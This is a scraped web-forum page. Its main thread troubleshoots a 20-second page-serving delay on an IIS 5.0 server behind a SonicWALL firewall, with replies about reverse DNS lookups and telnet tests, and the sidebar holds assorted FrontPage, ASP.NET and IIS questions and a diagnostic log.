| Delay in Serving Web Pages |
|
 |
Index ‹ Web Programming ‹ IIS
|
- Previous
- 1
- Frontpage Client >> TrevorWhen did you earn your "letters"? Just noticed your sig.
I musta missed the latest annoucements...congrats.
Robosama
- 2
- IIS >> different types of web server logsWhat are the different types of IIS logs generated and where can I find them
?
I have heard about the following types of logs
W3C, IIS, NCSA, Centralized Binary Logs, HTTP Error logs, URLScan logs, ODBC
logs
Where can I find them and how different are they.. say W3C, IIS,HTTP Error
logs ?
- 3
- Frontpage Programming >> SwishHello,
I have a template that contains a swi. file. Any suggestions on software to
edit these type of files?
Thanks.
Bill
- 4
- Frontpage Client >> New Microsoft Add-on for IE - Developer ToolbarIf you've ever used the FireFox Web Developer Extension, this is very much
like it. It is a very nice diagnostic Add-on for Internet Explorer, which
lets you look at any HTML document's DOM, outline various elements in the
browser, provide information about HTML elements, validate HTML and CSS,
etc.
http://www.microsoft.com/downloads/details.aspx?FamilyID=e59c3964-672d-4511-bb3e-2d5e1db91038&DisplayLang=en
--
HTH,
Kevin Spencer
Microsoft MVP
.Net Developer
Who is Mighty Abbott?
A twin turret scalawag.
- 5
- 6
- 7
- Frontpage Programming >> DBR error on emptyFP 2002 & Access 2002 website
I have several DBR regions which pull from unique queries in an Access Db -
The query has a conditional criteria to display only those records that
satisfy the criteria, unless there are no records which satisfy the criteria
in which case ALL RECORDS should be displayed. The queries all work in
Access.
Problem I encounter is when the query needs to display all records - it
errors as follows: Microsoft VBScript runtime error '800a01a8'
Object required
/eagle/_fpclass/fpdblib.inc, line 48
Line 48 in the fpdblib.inc file reads:
If Not IsEmpty(rs) And Not (rs Is Nothing) and Not IsNull(rs(fldname))
Then
Select Case rs(fldname).Type
Case 128, 204, 205 ' adBinary, adVarBinary, adLongVarBinary
FP_Field = "[#BINARY#]"
Case 201, 203 ' adLongVarChar, adLongVarWChar
if rs(fldname).DefinedSize > 255 then
' check for Access hyperlink fields (only absolute http
links)
fp_strVal = rs(fldname)
fp_idxHash1 = InStr(LCase(fp_strVal),"#http://")
if fp_idxHash1 > 0 then
fp_idxHash2 = InStr(fp_idxHash1+1,fp_strVal,"#")
if fp_idxHash2 > 0 then
' this is an Access hyperlink; extract the URL
part
fp_strVal = Mid(fp_strVal,fp_idxHash1+1)
if Right(fp_strVal,1) = "#" then
fp_strVal = Left(fp_strVal,Len(fp_strVal)-1)
end if
end if
end if
FP_Field = fp_strVal
Do I need to adjust the code somehow/somewhere? Is what I'm trying to do
even "do-able"?
- 8
- 9
- ASP.Net >> Setting a project for multiple usersDoes anyone know an article or how to setup a project so that more than one
person can work on it at a time? We have a network of computers at work and
me and another guy are the programmers. We usually work on our own machines
and do our individual projects. Now we would like to setup a project we
could both work on. Should we put all the project files on the network
server and install IIS on it and work like that? is that the typical way a
project is shared?
Thanks
- 10
- Frontpage Programming >> how to put a music player in my own web???how to put a music player in my own web??
-
rambo40
-----------------------------------------------------------------------
Posted via http://www.forum4designers.co
-----------------------------------------------------------------------
View this thread: http://www.forum4designers.com/message116023.htm
- 11
- ASP.Net >> Send email with logo at topHello -
I want to be able to send an email from my app that contains the logo from
my website at the top of it. I have searched the web and there are many
components out there, but isn't there an easier way? My logo is quite simple.
Any help will be greatly appreciated!
--
Sandy
- 12
- ASP.Net >> Essential ASP.NET With Examples in C#Essential ASP.NET With Examples in C#
Description : The Microsoft .NET Framework is exactly what its name
implies: A general system onto which a lot of application-specific
technologies are stuck. Essen...
Pages : 2815
http://books-download.com/Book177.aspx
- 13
- ASP/Active Server Pages >> ASP email applicationI need to create an online email application which will receive and
send emails from given accounts using ASP.
I am aware that I can use ASP components such as ASPEmail or
ASPSmartMail to send messages, but have no idea how to receive emails.
I read somewhere that CDONTS may help, but my provider has disabled
these on his server.
Any suggestions? Thanks ,R
- 14
- 15
- Frontpage Client >> using IE to view local index.htmlWhen viewing a copy of my web sight that is on my computer, not on a
server, IE lists the files in a directory instead of executing the
index.html file. Is there a way to have IE automatically bring up the
index.html without having to click on it?
|
| Author |
Message |
Evadne

|
Posted: Wed Oct 08 21:14:32 CDT 2003 |
Top |
IIS >> Delay in Serving Web Pages
We have a web server running Win2k server and IIS 5.0 (complete with all service packs) set up in a DMZ using a Sonicwall Pro230 firewall.
We are experiencing a delay of approximately 20 seconds between requesting a web page and it actually arriving at the browser.
From monitoring the server it appears that IIS prepares the page contents very quickly which is then followed up by a lag before the page actually arrives at the browser. This happens when pages are requested over the internet, from the LAN, or even from another machine on the DMZ (connected via a 100Mb switch).
It looks like a networking issue rather than an IIS performance or bandwidth issue. Weâ??ve just taken delivery of another Dell Web server and are experiencing exactly the same problems on that as well.
IP address of server is fixed.
Web Programming197
|
| |
|
| |
 |
Bernard

|
Posted: Wed Oct 08 21:14:32 CDT 2003 |
Top |
IIS >> Delay in Serving Web Pages
is this the first request to the web application ?
or you experience same latency with all pages ?
if you browse from another machine within the DMZ.
same speed ? or is faster response ?
what do the page actually do ? connect to data source,
runs a query and return records ?
if you test a simple response.write "hello world" - same behavior ?
--
Regards,
Bernard Cheah
http://support.microsoft.com/
Please respond to newsgroups only ...
"Steve Wright" <EMail@HideDomain.com> wrote in message
news:EMail@HideDomain.com...
> We have a web server running Win2k server and IIS 5.0 (complete with all
service packs) set up in a DMZ using a Sonicwall Pro230 firewall.
> We are experiencing a delay of approximately 20 seconds between requesting
a web page and it actually arriving at the browser.
> From monitoring the server it appears that IIS prepares the page contents
very quickly which is then followed up by a lag before the page actually
arrives at the browser. This happens when pages are requested over the
internet, from the LAN, or even from another machine on the DMZ (connected
via a 100Mb switch).
> It looks like a networking issue rather than an IIS performance or
bandwidth issue. Weâ??ve just taken delivery of another Dell Web server and
are experiencing exactly the same problems on that as well.
> IP address of server is fixed.
>
|
| |
|
| |
 |
wailaki

|
Posted: Thu Oct 09 14:42:05 CDT 2003 |
Top |
IIS >> Delay in Serving Web Pages
I am running IIS just fine on a SonicWALL network - LAN and DMZ both
work equally well. I've seen one case that sounds like yours - it
turned out to be the IIS was set to do DNS lookups for each client
that connected, and if there is no PTR record in place for the IP you
are coming from, it has to time out during that process, which might
explain the delay.
Make sure you test with telnet client on port 80, to see if the basic
TCP connection snaps open within milliseconds of the request.
"Bernard" <EMail@HideDomain.com> wrote in message news:<EMail@HideDomain.com>...
> is this the first request to the web application ?
> or you experience same latency with all pages ?
>
> if you browse from another machine within the DMZ.
> same speed ? or is faster response ?
>
> what do the page actually do ? connect to data source,
> runs a query and return records ?
>
> if you test a simple response.write "hello world" - same behavior ?
>
> --
> Regards,
> Bernard Cheah
> http://support.microsoft.com/
> Please respond to newsgroups only ...
>
>
>
> "Steve Wright" <EMail@HideDomain.com> wrote in message
> news:EMail@HideDomain.com...
> > We have a web server running Win2k server and IIS 5.0 (complete with all
> service packs) set up in a DMZ using a Sonicwall Pro230 firewall.
> > We are experiencing a delay of approximately 20 seconds between requesting
> a web page and it actually arriving at the browser.
> > From monitoring the server it appears that IIS prepares the page contents
> very quickly which is then followed up by a lag before the page actually
> arrives at the browser. This happens when pages are requested over the
> internet, from the LAN, or even from another machine on the DMZ (connected
> via a 100Mb switch).
> > It looks like a networking issue rather than an IIS performance or
> bandwidth issue. Weâ??ve just taken delivery of another Dell Web server and
> are experiencing exactly the same problems on that as well.
> > IP address of server is fixed.
> >
|
| |
|
| |
 |
| |
 |
Index ‹ Web Programming ‹ IIS |
- Next
- 1
- 2
- 3
- ASP.Net >> Available SAP SD functional consultant with usContact : Sudin
Direct : 402 218 2179
Email : sudin@kraftware.com
Hi,
We have the following SAP SD and SAP CRM consultant available.
Consultant Name: K P
Summary:
=B7Certified SAP CRM consultant.
=B7Trainings attended: SAP SD (sales and distribution), SAP CRM, SAP BW
and ABAP/4.
=B7About 5 years and 7 months of total experience.
=B7About 4 Years and 2 months of experience in SAP Implementation and
Application support.
=B7Worked on end-to-end implementation, integrations development, and
application support.
=B7Design and customization of the SD module and its functionality.
=B7Design and customization of the SAP CRM and its functionality.
=B7Experience in customizing SAP R/3 sales, delivery and billing
processes.
=B7Experience in customizing IC Winclient and Marketing functionalities.
Please feel free to contact us for additional information.
Thanks & Regards,
Sudin
Kraftware Inc,
Direct- 402 218 2179
Email - sudin@kraftware.com
- 4
- 5
- IIS >> IIS, CGI, PythonI want to run a python script as CGI. I set everything up correctly
(well, almost!) but my Python script wants to execute a Perforce (p4,
source control) command. I get this error:
Traceback (most recent call last):
File "C:\Inetpub\cgi-bin\p4rss.py", line 30, in ?
stream = os.popen(p4changes)
WindowsError: [Errno 5] Access is denied:
'C:\\WINDOWS\\system32\\cmd.exe /c p4 -G changes -l -m 10 //...'
What this says to me is that I don?t have permission from a cgi script
to shell out to cmd.exe, since that?s probably dangerous.
Do you know of a way that I can enable this? I have SP2 installed, so I
suspect this might be a result of the increased security.
Am I close?
--
Nick Codignotto - nick2@rprimordia.com (remove first letter of domain
name please)
- 6
- Frontpage Client >> Frontpage install problemWhen I try to install frontpage 2003 I get it installing right up til it goes
looking for cab files to cache to local installation setup. It then gives me
a error unable to locate PR308246.cab but when I go looking at the CD its
right there and I can click on it and open the cab and see there files are
there-I know if the CD or cab was corrupt, I shouldn't be able to view the
files but I can. So can anyone tell me what is going on with the CD or cab or
the installation that I dont know? If anyone here has a solution they found
or know please tell me as I can install most of the other CD but frontpage is
giving me issues.
- 7
- ASP.Net >> Forms Authentication Redirect URLI want to be able to programmatically log a user in as a guest and redirect
them to a different page.
Is there any way to do a RedirectFromLoginPage() and explicity specify the
page to which the user will be redirected after the login?
-- p
- 8
- ASP.Net >> Getting a full dataset from Oracle through vb.net / ADO.net?I have similar code (a procedure and function) working perfectly with
a sql server data source. I'm trying to do the same things with
Oracle, but have run into the problems.
I'm not sure if producing a cursor is my only and best option.
PROCEDURE sp_Get_Order_History(v_ani IN number,
output_cursor out PK_CURSORES.generic_cursor) AS
BEGIN
open output_cursor for
select o.account_number, p.phone, o.amount, o.name, o.init_date
from orders o
join users_phones p on p.account_number = o.account_number
where p.phone = v_ani
order by Init_date desc;
end sp_Get_Order_History;
in vb.net:
Function GetOrderHistory(ByVal Phone As String) As DataSet
If p_cnn.State = ConnectionState.Closed Then
p_cnn.Open()
End If
Dim cmd As New OracleCommand
With cmd
.CommandType = CommandType.StoredProcedure
.CommandText = "PK_RETAILER.sp_Get_Order_History"
.CommandTimeout = 0
.Connection = p_cnn
.Parameters.Add(New OracleParameter("v_ani",
OracleType.VarChar)).Value = Phone
.Parameters.Add(New OracleParameter("output_cursor",
OracleType.Cursor)).Direction = ParameterDirection.Output
End With
Dim adpt As New
OracleDataAdapter(cmd.Parameters("output_cursor").Value)
Dim ds As New DataSet
adpt.Fill(ds, "orders")
Return ds
cmd.Dispose()
p_cnn.Close()
End Function
In my markup:
<asp:ObjectDataSource ID="DSOrders" runat="server"
SelectMethod="GetOrderHistory"
TypeName="xxx.xxxx">
<SelectParameters>
<asp:ControlParameter
ControlID="CustomerPhoneTextBox" PropertyName="Text" Name="Phone"
Type="String" DefaultValue=""/>
</SelectParameters>
</asp:ObjectDataSource>
I get this error:
The SelectCommand property has not been initialized before calling
'Fill'.
Description: An unhandled exception occurred during the execution of
the current web request. Please review the stack trace for more
information about the error and where it originated in the code.
Exception Details: System.InvalidOperationException: The SelectCommand
property has not been initialized before calling 'Fill'.
Source Error:
Line 61: Dim adpt As New
OracleDataAdapter(cmd.Parameters("output_cursor").Value)
Line 62: Dim ds As New DataSet
Line 63: adpt.Fill(ds, "orders")
Line 64: Return ds
Line 65:
In sql server I have procedure that produces a Dataset,not a cursor.
I'm likely needing to loop through the cursor right?
Thanks for any help or information.
- 9
- 10
- ASP.Net >> Change target of form AFTER submitHi,
I have an aspx page that has a series of radio buttons that are
autopostback. When a selection is made, the form posts back and displays
specific input fields for the radio button selected. After the input fields
have been filled out, a button is clicked that changes the target of the
form to "_blank" and posts back - opening a new page where the input fields
are used to create a pdf document. The problem is getting the target of the
form back to nothing so that if the user clicks another radio button (or
something else on the page that posts back) it does not open a new window.
With javascript, I have tried the following:
document.forms[0].target='_blank';
document.getElementById('{0}').click();
document.forms[0].target='';
and
document.forms[0].target='_blank';
__doPostBack('btnPDF','');
document.forms[0].target='';
...but the JS does not work as intended. I don't want to have to change the
target of the form back every time I would normally post back - I want to be
able to change it after the form is submitted. Ideally, I'd like to have a
"afterSubmit" event for the form!
Any ideas?
Thanks,
Dave
- 11
- Frontpage Client >> Frontpage web component to 'search current web' - problemI used the Frontpage web component to 'search current web'
When I test this on my published website I get the message ' Service is not
running'
My host is a leading provider and my account is set up to run Frontpage
extensions.
The support at the host said that it's a recognised problem that this
component uses excessive resources that impacts other customers and so it
cannot be run.
Apparently other clients write their own script.
Can anyone help with something simple to enable my site to be searched by
visitors?
thanks
Chris
- 12
- Frontpage Client >> Upload ComponetWhen you use the upload componet in Frontpage, it only allows you to upload
small files up to 1MB in size to the web server. I noticed if you add a
"Manage Users" in FrontPage Server Extensions 2002 as having "Author" rights,
then you are able to upload large files. This is a security risk, because
they can use Frontpage to access the files on the web server. Is their a way
I can remove the "Author" rights and still allow large uploads?
Thanks for your help
Dave
- 13
- IIS >> Processors and Requests QueuedI think I'm lost in a fog.... when I run IISState against InetInfo.exe
during a high-processor (95-99%) high requests queued (40) event on our web
server (4 cpu, w2k) the log doesn't show me any pages being handled - always
says
ASP.dll symbols not found. Unable to locate ASP page
Below is a typical IISState log during a high cpu/requests queued event -
any suggestions, comments, insight would be appreciated.
Thanks
Opened log file 'C:\iisstate\output\IISState-904.log'
***********************
Starting new log output
IISState version 3.3.1
Tue May 24 10:30:45 2005
OS = Windows 2000
Executable: inetinfo.exe
PID = 904
Note: Thread times are formatted as HH:MM:SS.ms
***********************
Thread ID: 0
System Thread ID: 384
Kernel Time: 0:0:0.15
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 0006f89c 7c5862e9 ntdll!ZwReadFile+0xb
01 0006f910 7c2e4cd9 KERNEL32!ReadFile+0x181
02 0006f93c 7c2e4b5f ADVAPI32!ScGetPipeInput+0x28
03 0006f9b8 7c2e6632 ADVAPI32!ScDispatcherLoop+0x4a
04 0006fbf4 01002884 ADVAPI32!StartServiceCtrlDispatcherA+0x7d
05 0006fd30 01001e94 inetinfo!StartDispatchTable+0x2f1
06 0006ff70 01002fbf inetinfo!main+0x654
07 0006ffc0 7c59893d inetinfo!mainCRTStartup+0xff
08 0006fff0 00000000 KERNEL32!BaseProcessStart+0x3d
Thread ID: 1
System Thread ID: 390
Kernel Time: 0:0:0.78
User Time: 0:0:0.31
Thread Type: Other
# ChildEBP RetAddr
00 005dfd1c 7c599fe4 ntdll!ZwWaitForSingleObject+0xb
01 005dfd44 7c57b3db KERNEL32!WaitForSingleObjectEx+0x71
02 005dfd54 6e6f1685 KERNEL32!WaitForSingleObject+0xf
03 005dfd70 01002440 iisadmin!ServiceEntry+0x156
04 005dffa4 7c2e4e9b inetinfo!InetinfoStartService+0x2bd
05 005dffb4 7c57b388 ADVAPI32!ScSvcctrlThreadW+0xe
06 005dffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 2
System Thread ID: 3c8
Kernel Time: 0:1:41.281
User Time: 0:0:15.343
Thread Type: Other
# ChildEBP RetAddr
00 0071fe5c 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 0071feac 77e1e9a5 KERNEL32!WaitForMultipleObjectsEx+0xea
02 0071ff08 77e1e9f2 USER32!MsgWaitForMultipleObjectsEx+0x153
03 0071ff24 6e5a5a7c USER32!MsgWaitForMultipleObjects+0x1d
04 0071ff7c 780085bc IisRTL!SchedulerWorkerThread+0xa7
05 0071ffb4 7c57b388 MSVCRT!_endthreadex+0xc1
06 0071ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 3
System Thread ID: 3cc
Kernel Time: 0:1:40.921
User Time: 0:0:17.234
Thread Type: Other
# ChildEBP RetAddr
00 0075fe5c 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 0075feac 77e1e9a5 KERNEL32!WaitForMultipleObjectsEx+0xea
02 0075ff08 77e1e9f2 USER32!MsgWaitForMultipleObjectsEx+0x153
03 0075ff24 6e5a5a7c USER32!MsgWaitForMultipleObjects+0x1d
04 0075ff7c 780085bc IisRTL!SchedulerWorkerThread+0xa7
05 0075ffb4 7c57b388 MSVCRT!_endthreadex+0xc1
06 0075ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 4
System Thread ID: 3d0
Kernel Time: 0:1:43.468
User Time: 0:0:16.375
Thread Type: Other
# ChildEBP RetAddr
00 0079fe5c 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 0079feac 77e1e9a5 KERNEL32!WaitForMultipleObjectsEx+0xea
02 0079ff08 77e1e9f2 USER32!MsgWaitForMultipleObjectsEx+0x153
03 0079ff24 6e5a5a7c USER32!MsgWaitForMultipleObjects+0x1d
04 0079ff7c 780085bc IisRTL!SchedulerWorkerThread+0xa7
05 0079ffb4 7c57b388 MSVCRT!_endthreadex+0xc1
06 0079ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 5
System Thread ID: 3d4
Kernel Time: 0:2:3.62
User Time: 0:0:18.968
Thread Type: Other
# ChildEBP RetAddr
00 007dfe5c 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 007dfeac 77e1e9a5 KERNEL32!WaitForMultipleObjectsEx+0xea
02 007dff08 77e1e9f2 USER32!MsgWaitForMultipleObjectsEx+0x153
03 007dff24 6e5a5a7c USER32!MsgWaitForMultipleObjects+0x1d
04 007dff7c 780085bc IisRTL!SchedulerWorkerThread+0xa7
05 007dffb4 7c57b388 MSVCRT!_endthreadex+0xc1
06 007dffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 6
System Thread ID: 594
Kernel Time: 0:0:0.156
User Time: 0:0:0.31
Thread Type: SMTP Service Worker Thread
# ChildEBP RetAddr
00 00ecfc1c 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 00ecfc6c 77e1e9a5 KERNEL32!WaitForMultipleObjectsEx+0xea
02 00ecfcc8 77e1e9f2 USER32!MsgWaitForMultipleObjectsEx+0x153
03 00ecfce4 769c71e0 USER32!MsgWaitForMultipleObjects+0x1d
04 00ecfd30 6b561a78 INFOCOMM!IIS_SERVICE::StartServiceOperation+0x209
05 00ecfd70 01002440 SMTPSVC!ServiceEntry+0x136
06 00ecffa4 7c2e4e9b inetinfo!InetinfoStartService+0x2bd
07 00ecffb4 7c57b388 ADVAPI32!ScSvcctrlThreadW+0xe
08 00ecffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 7
System Thread ID: 5fc
Kernel Time: 0:0:0.15
User Time: 0:0:0.31
Thread Type: Other
# ChildEBP RetAddr
00 00f0fc1c 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 00f0fc6c 77e1e9a5 KERNEL32!WaitForMultipleObjectsEx+0xea
02 00f0fcc8 77e1e9f2 USER32!MsgWaitForMultipleObjectsEx+0x153
03 00f0fce4 769c71e0 USER32!MsgWaitForMultipleObjects+0x1d
04 00f0fd30 65f0cfd8 INFOCOMM!IIS_SERVICE::StartServiceOperation+0x209
05 00f0fd70 01002440 w3svc!ServiceEntry+0x1b5
06 00f0ffa4 7c2e4e9b inetinfo!InetinfoStartService+0x2bd
07 00f0ffb4 7c57b388 ADVAPI32!ScSvcctrlThreadW+0xe
08 00f0ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 8
System Thread ID: 638
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: HTTP Listener
# ChildEBP RetAddr
00 010cff5c 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 010cff88 6d7029ef KERNEL32!GetQueuedCompletionStatus+0x27
02 010cffb4 7c57b388 ISATQ!I_AtqOplockThreadFunc+0x32
03 010cffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 9
System Thread ID: 650
Kernel Time: 0:0:37.109
User Time: 0:1:8.328
Thread Type: HTTP Listener
# ChildEBP RetAddr
00 0110f6d8 769b245c INFOCOMM!FastFindAnonymousToken+0x24
01 0110f6ec 65f07611 INFOCOMM!TCP_AUTHENT::ClearTextLogon+0x16
02 0110f888 65f03977 w3svc!HTTP_REQ_BASE::LogonUserA+0x67e
03 0110fcac 65f0275a w3svc!HTTP_REQ_BASE::OnRestartRequest+0xa42
04 0110fcec 65f025a4 w3svc!HTTP_REQ_BASE::OnCompleteRequest+0x498
05 0110fd2c 65f02501 w3svc!HTTP_REQ_BASE::UnWrapRequest+0x1f4
06 0110fd4c 65f023b8 w3svc!HTTP_REQ_BASE::OnFillClientReq+0x7a
07 0110fec4 65f01d97 w3svc!HTTP_REQUEST::DoWork+0x99
08 0110fee4 65f06be5 w3svc!CLIENT_CONN::DoWork+0x1aa
09 0110ff08 65f06b58 w3svc!CreateClient+0x7b
0a 0110ff4c 6d701ad2 w3svc!W3OnConnectEx+0x118
0b 0110ff80 6d7029a6 ISATQ!AtqpProcessContext+0x23e
0c 0110ffb4 7c57b388 ISATQ!AtqPoolThread+0x1a8
0d 0110ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 10
System Thread ID: 654
Kernel Time: 0:0:21.781
User Time: 0:0:40.734
Thread Type: HTTP Listener
# ChildEBP RetAddr
00 0114ff50 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 0114ff7c 6d702957 KERNEL32!GetQueuedCompletionStatus+0x27
02 0114ffb4 7c57b388 ISATQ!AtqPoolThread+0x40
03 0114ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 11
System Thread ID: 65c
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Possible ASP page. Possible DCOM activity
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
No remote call being made
# ChildEBP RetAddr
00 012cfeb8 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 012cfee4 77d31394 KERNEL32!GetQueuedCompletionStatus+0x27
02 012cff20 77d3e93f RPCRT4!COMMON_ProcessCalls+0x9e
03 012cff74 77d3e8c2 RPCRT4!LOADABLE_TRANSPORT::ProcessIOEvents+0x99
04 012cff78 77d35924 RPCRT4!ProcessIOEventsWrapper+0x9
05 012cffa8 77d358d6 RPCRT4!BaseCachedThreadRoutine+0x4f
06 012cffb4 7c57b388 RPCRT4!ThreadStartRoutine+0x18
07 012cffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 12
System Thread ID: 664
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 0164fd20 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 0164fd70 7c59a0c2 KERNEL32!WaitForMultipleObjectsEx+0xea
02 0164fd88 778322b2 KERNEL32!WaitForMultipleObjects+0x17
03 0164ffb4 7c57b388 RTUTILS!TraceServerThread+0xde
04 0164ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 13
System Thread ID: 688
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 0169ff20 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 0169ff70 7c59a0c2 KERNEL32!WaitForMultipleObjectsEx+0xea
02 0169ff88 701224fa KERNEL32!WaitForMultipleObjects+0x17
03 0169ffb4 7c57b388 exstrace!RegNotifyThread+0x6f
04 0169ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 14
System Thread ID: 68c
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 016dff24 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 016dff74 7c59a0c2 KERNEL32!WaitForMultipleObjectsEx+0xea
02 016dff8c 70121e6a KERNEL32!WaitForMultipleObjects+0x17
03 016dffb4 7c57b388 exstrace!WriteTraceThread+0x2f
04 016dffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 15
System Thread ID: 690
Kernel Time: 0:0:0.15
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 018dff0c 685117e0 KERNEL32!InterlockedIncrement+0xd
01 018dff18 685119b4 RWNH!CSimpleCritSection::Enter+0xa
02 018dff3c 6ff28e25 RWNH!CShareLockNH::ExclusiveLock+0x1d
03 018dff80 6ff24c9a FCACHDLL!CLRUList::Expire+0x58
04 018dffa4 6ff2843c
FCACHDLL!CacheEx<CFileCacheObject,CFileCacheKey,CFileCacheConstructorBase,void *>::Expire+0x33
05 018dffb4 7c57b388 FCACHDLL!CScheduleThread::ScheduleThread+0x40
06 018dffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 16
System Thread ID: 694
Kernel Time: 0:0:0.15
User Time: 0:0:0.0
Thread Type: SMTP Service Worker Thread
# ChildEBP RetAddr
00 01a2ff18 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 01a2ff68 7c59a0c2 KERNEL32!WaitForMultipleObjectsEx+0xea
02 01a2ff80 6b57b026 KERNEL32!WaitForMultipleObjects+0x17
03 01a2ffb4 7c57b388 SMTPSVC!TcpRegNotifyThread+0x136
04 01a2ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 17
System Thread ID: 698
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: SMTP Service Worker Thread
# ChildEBP RetAddr
00 01a6ff68 7c599fe4 ntdll!ZwWaitForSingleObject+0xb
01 01a6ff90 7c57b3db KERNEL32!WaitForSingleObjectEx+0x71
02 01a6ffa0 6b57ae5a KERNEL32!WaitForSingleObject+0xf
03 01a6ffb4 7c57b388 SMTPSVC!FreeLibThread+0x1d
04 01a6ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 18
System Thread ID: 6bc
Kernel Time: 0:0:0.15
User Time: 0:0:0.15
Thread Type: HTTP Compression Thread
# ChildEBP RetAddr
00 01b2ff5c 7c599fe4 ntdll!ZwWaitForSingleObject+0xb
01 01b2ff84 7c57b3db KERNEL32!WaitForSingleObjectEx+0x71
02 01b2ff94 732c3366 KERNEL32!WaitForSingleObject+0xf
03 01b2ffb4 7c57b388 compfilt!CompressionThread+0x29
04 01b2ffc0 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 19
System Thread ID: 6e0
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 01c4fce0 74fd1394 ntdll!ZwWaitForSingleObject+0xb
01 01c4fd1c 74fd3c59 msafd!SockWaitForSingleObject+0x1a8
02 01c4fe08 750312f5 msafd!WSPSelect+0x24e
03 01c4fe6c 6e2b3b6e WS2_32!select+0xe7
04 01c4ffb4 7c57b388 inetsloc!SocketListenThread+0x51
05 01c4ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 20
System Thread ID: 6e4
Kernel Time: 0:0:0.15
User Time: 0:0:0.0
Thread Type: Possible ASP page. Possible DCOM activity
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
No remote call being made
# ChildEBP RetAddr
00 01c8fe24 77d37ba7 ntdll!ZwReplyWaitReceivePortEx+0xb
01 01c8ff74 77d37b4c RPCRT4!LRPC_ADDRESS::ReceiveLotsaCalls+0x74
02 01c8ff78 77d359c3 RPCRT4!RecvLotsaCallsWrapper+0x9
03 01c8ffa8 77d358d6 RPCRT4!BaseCachedThreadRoutine+0x11f
04 01c8ffb4 7c57b388 RPCRT4!ThreadStartRoutine+0x18
05 01c8ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 21
System Thread ID: 700
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 01cdff54 7c599fe4 ntdll!ZwWaitForSingleObject+0xb
01 01cdff7c 7c57b3db KERNEL32!WaitForSingleObjectEx+0x71
02 01cdff8c 741a99cd KERNEL32!WaitForSingleObject+0xf
03 01cdffb4 7c57b388 aqueue!CSMTP_RETRY_HANDLER::RetryThreadRoutine+0xce
04 01cdffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 22
System Thread ID: 70c
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: SMTP Service Worker Thread
# ChildEBP RetAddr
00 01d1fed0 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 01d1ff20 7c59a0c2 KERNEL32!WaitForMultipleObjectsEx+0xea
02 01d1ff38 741900e1 KERNEL32!WaitForMultipleObjects+0x17
03 01d1ff9c 6b56dccd aqueue!CConnMgr::GetNextConnection+0x1da
04 01d1ffb4 7c57b388 SMTPSVC!PERSIST_QUEUE::QueueThreadRoutine+0x23
05 01d1ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 23
System Thread ID: 71c
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: HTTP Listener
# ChildEBP RetAddr
00 01ddfdfc 74fd1394 ntdll!ZwWaitForSingleObject+0xb
01 01ddfe38 74fd3c59 msafd!SockWaitForSingleObject+0x1a8
02 01ddff24 750312f5 msafd!WSPSelect+0x24e
03 01ddff88 6d7075bd WS2_32!select+0xe7
04 01ddffb0 6d70791b ISATQ!ATQ_BMON_SET::BmonThreadFunc+0x22
05 01ddffb4 7c57b388 ISATQ!BmonThreadFunc+0x9
06 01ddffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 24
System Thread ID: 720
Kernel Time: 0:0:0.31
User Time: 0:0:0.31
Thread Type: Other
# ChildEBP RetAddr
00 01e1fe70 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 01e1fec0 77e1e9a5 KERNEL32!WaitForMultipleObjectsEx+0xea
